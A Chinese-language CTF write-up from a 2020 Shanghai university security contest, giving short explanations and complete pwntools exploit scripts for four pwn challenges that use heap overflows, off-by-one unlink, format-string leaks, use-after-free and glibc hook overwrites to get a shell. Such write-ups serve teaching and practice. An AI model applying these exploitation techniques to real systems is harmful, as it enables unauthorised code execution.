2020上海大学生网络安全赛pwn-WP

misc

签到

linux中运行下命令就出来flag了。

PWN

cpu_emulator

简单的vm题，stack可以越界写

首先free掉一个0x20大小的chunk，然后利用stack的越界写修改其fd到bss段上，并且将它的size改掉，避免重复进入该chunk。

接着申请到bss段上把buf置0，并将stack指针修改为got表中atoi的地址。

最后按位加减got表中atoi函数地址，改成system，再输入/bin/sh即可getshell。

from pwn import *
#context.log_level = 'debug'
p = process("emulator")
p = remote("123.56.52.128","18236")
libc = ELF("emulator").libc
def input_code(size,data):
	p.recvuntil(">> ")
	p.sendline("1")
	p.recvuntil("instruction size:")
	p.sendline(str(size))
	p.recvuntil("instruction:")
	p.sendline(data)
def run():
	p.recvuntil(">> ")
	p.sendline("2")
def command(x):
	return x << 0x1a
def count1(x):
	a2 = 5
	a3 = 21
	return ((x<<a3) & (((1 << a2) - 1) << a3))
def count2(x):
	a2 = 5
	a3 = 16
	return ((x<<a3) & (((1 << a2) - 1) << a3))
def count3(x):
	a2 = 16
	a3 = 0
	return ((x<<a3) & (((1 << a2) - 1) << a3))
def cmd(a,b,c,d):
	return p64(command(a)+count1(b)+count2(c)+count3(d))
libc.address = 0x7ffff79e2000
one = [0x4f3d5,0x4f432,0x10a41c]
code = ''
input_code(0xc8,code)
code = ''
input_code(0x38,code)
code = ''
code += cmd(8,0,0,0x8000)*2
code += cmd(8,0,0,0x10)
code += cmd(8,9,1,0xb0)
code += cmd(8,9,2,0x20)
code += cmd(8,9,3,0x60)
code += cmd(8,9,4,0x21)
code += cmd(8,9,5,0x1)

code += cmd(0x2b,0,1,0)
code += cmd(8,0,0,0x1)
code += cmd(0x2b,0,2,0)

code += cmd(8,0,0,0x1)
code += cmd(0x2b,0,3,0)

code += cmd(9,0,0,0x2)
code += cmd(9,0,0,0x8)
code += cmd(0x2b,0,4,0)
code += cmd(8,0,0,0x1)
code += cmd(0x2b,0,5,0)
input_code(0xf00,code)
run()
code = ''
input_code(0xc8,code)

code = ''
input_code(0xc8,p64(0)*23+p64(0x602058))



code = ''
input_code(0x300,code)
code = ''
code += cmd(0x23,9,0,2)
code += cmd(8,0,0,1)
code += cmd(0x2b,9,0,2)

code += cmd(0x23,9,0,1)
code += cmd(9,0,0,0x12)
code += cmd(0x2b,9,0,1)

code += cmd(0x23,9,0,0)
code += cmd(9,0,0,0x50)
code += cmd(0x2b,9,0,0)
input_code(0x400,code)
#gdb.attach(p,'b *0x400911')
print hex(libc.sym['system'])
run()
p.sendline("/bin/sh")
p.interactive()

lgtwo

存在off by one漏洞，利用该漏洞进行unlink操作将堆块操作地址指向bss段上，即可任意地址读写。

同时再向bss段上存放堆块的地址存写入main_arean地址，利用上面的地址修改其低位，爆破到stdout进行ioleak。

接着向__free_hook中写入system函数地址即可getshell。

from pwn import *
#p = process("./pwn")
context.timeout = 1
def exp():
	p = remote("123.56.52.128","45830")
	libc = ELF("./pwn").libc
	def add(size,data='a'):
		p.recvuntil(">> ")
		p.sendline("1")
		p.recvuntil("size?")
		p.sendline(str(size))
		p.recvuntil("content?")
		p.sendline(data)
	def free(idx):
		p.recvuntil(">> ")
		p.sendline("2")
		p.recvuntil("index ?")
		p.sendline(str(idx))
	def edit(idx,data):
		p.recvuntil(">> ")
		p.sendline("4")
		p.recvuntil("index ?")
		p.sendline(str(idx))
		p.recvuntil("what is your new content ?")
		p.send(data)
	add(0xf8)
	add(0xf8)
	add(0xf8)
	edit(0,p64(0)+p64(0xf1)+p64(0x6020C0-0x18)+p64(0x6020C0-0x10)+'\x00'*0xd0+p64(0xf0)+'\x00')
	free(1)
	add(0x1e8)
	add(0xf8)#3
	add(0xf8)
	add(0xf8)
	free(3)
	edit(4,'\x00'*0xf0+p64(0x200)+'\x00')
	free(5)
	add(0xf8)#3
	add(0xf8)#5
	add(0xf8)
	free(5)
	edit(4,p64(0)+p64(0x6020C0-8))
	add(0xf8)
	edit(0,'\x00'*0x18+p64(0x6020c0)+'\x20\x26')
	edit(1,p64(0xfbad1800)+p64(0)*3+'\x00')
	p.recvuntil(p64(0xfbad1800)+p64(0)*3)
	libc.address = u64(p.recv(8))-0x3C5600
	print hex(libc.address)
	if ((libc.address&0xfff) == 0):
		edit(0,p64(0x6020c0)+p64(libc.sym['__free_hook']))
		edit(1,p64(libc.sym['system']))
		edit(6,'/bin/sh\x00')
		free(6)
		#gdb.attach(p)
		p.interactive()
	p.close()
while(1):
	try:
		exp()
	except:
		print 'fail'

EASY_ABNORMAL

湖湘杯的原题，利用name来进行泄漏，得到libc地址。在堆上布置好one_gadget地址并free两个堆块得到堆地址。

接着用后面函数劫持栈地址从而执行onegadget。

from pwn import *
p = process("./pwn")
libc = ELF("./pwn").libc
p = remote("123.56.52.128","10012")
p.recvuntil("NAME")
p.send("%11$p")
def add(data):
	p.recvuntil("CHOICE :")
	p.sendline("2")
	p.recvuntil("cnt:")
	p.sendline(data)
def free(idx):
	p.recvuntil("CHOICE :")
	p.sendline("3")
	p.recvuntil("idx:")
	p.sendline(str(idx))
def show():
	p.recvuntil("CHOICE :")
	p.sendline("4")
def show_name():
	p.recvuntil("CHOICE :")
	p.sendline("1")
def backdoor(data):
	p.recvuntil("CHOICE :")
	p.sendline("23333")
	p.recvuntil("INPUT:")
	p.sendline(data)
one = [0x45226,0x4527a,0xf0364,0xf1207]
show_name()
p.recvuntil("INFO:")
libc.address = int(p.recvline()[:-1],16)-0x20840
add(p64(0)*3+p64(libc.address+one[3]))
add('aaa')
free(0)
free(1)
show()
p.recvuntil("idx 2:")
heap = u64(p.recv(6)+'\x00\x00')
backdoor(p64(0)*4+p64(heap+0x20))
p.interactive()

maj0rone

存在uaf，利用ioleak获得libc地址，然后修改__malloc_hook即可getshell。

from pwn import *
context.timeout=1
def exp():
	libc = ELF("./pwn").libc
	p = remote("123.56.52.128","18523")
	#p = process("./pwn")
	def add(size):
		p.recvuntil(">> ")
		p.sendline("1")
		p.recvuntil("please answer the question\n")
		p.sendline(str(80))
		p.recvuntil("______?")
		p.sendline(str(size))
		p.recvuntil("start_the_game,yes_or_no?")
		p.sendline('n')
	def free(idx):
		p.recvuntil(">> ")
		p.sendline("2")
		p.recvuntil("index ?")
		p.sendline(str(idx))
	def edit(idx,data):
		p.recvuntil(">> ")
		p.sendline("4")
		p.recvuntil("index ?")
		p.sendline(str(idx))
		p.recvuntil("__new_content ?")
		p.send(data)
	one = [0x45226,0x4527a,0xf0364,0xf1207]
	add(0x208)
	free(0)
	add(0x18)
	add(0x68)
	add(0x68)
	add(0x18)
	free(2)
	edit(0,'\x00'*0x18+p64(0xe1))
	free(2)
	edit(0,'\x00'*0x18+p64(0x71)+'\xdd\x25')
	add(0x68)
	add(0x68)
	edit(6,'\x00'*3+p64(0)*6+p64(0xfbad1800)+p64(0)*3+'\x00')
	p.recvuntil(p64(0xfbad1800))
	p.recv(32)
	libc.address = u64(p.recv(6)+'\x00\x00') -0x3C56A3
	print hex(libc.address)
	if ((libc.address&0xfff) == 0):
		free(2)
		edit(2,p64(libc.sym['__malloc_hook']-0x23))
		add(0x68)
		add(0x68)
		edit(8,'\x00'*0xb+p64(libc.sym['realloc']+6)+p64(libc.address+one[3]))
		#gdb.attach(p,'b malloc')
		p.recvuntil(">> ")
		p.sendline("1")
		p.recvuntil("please answer the question\n")
		p.sendline(str(80))
		p.recvuntil("______?")
		p.sendline(str(0))
		p.interactive()
	p.close()
while(1):
	try:
		exp()
	except:
		print 'fail'